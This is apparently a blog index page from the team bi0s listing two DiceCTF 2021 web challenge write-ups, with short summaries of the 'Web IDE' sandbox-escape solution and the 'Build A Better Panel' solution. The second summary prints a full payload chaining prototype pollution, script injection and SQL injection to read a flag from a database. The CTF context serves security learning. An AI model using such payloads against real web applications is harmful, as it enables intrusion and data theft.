bi0s

Web IDE - DiceCTF 2021

Yadhu Krishna M
2021-02-09
Web Exploitation

tl;dr

  • Unintended Solution: Cookie Path Restriction bypass using pop-up windows + JS Sandbox Escape
  • Intended Solution: Service Workers + JS Sandbox Escape
XSS DiceCTF JavaScript Sandbox Escape

Build A Better Panel - Dice CTF 2021

Az3z3l
2021-02-09
Web Exploitation

tl;dr

  • Payload: {"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='/admin/debug/add_widget?panelid=star7rix&widgetname=test123&widgetdata=%27%29%2C%28%27star7rix%27%2C+%28select+flag+from+flag%29%2C+%27%7B%22type%22%3A%22test123%22%7D%27%29+--'></script>\"}}"}
XSS Prototype Pollution CSP DiceCTF

Official blog of team bi0s

Blog content follows the Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License
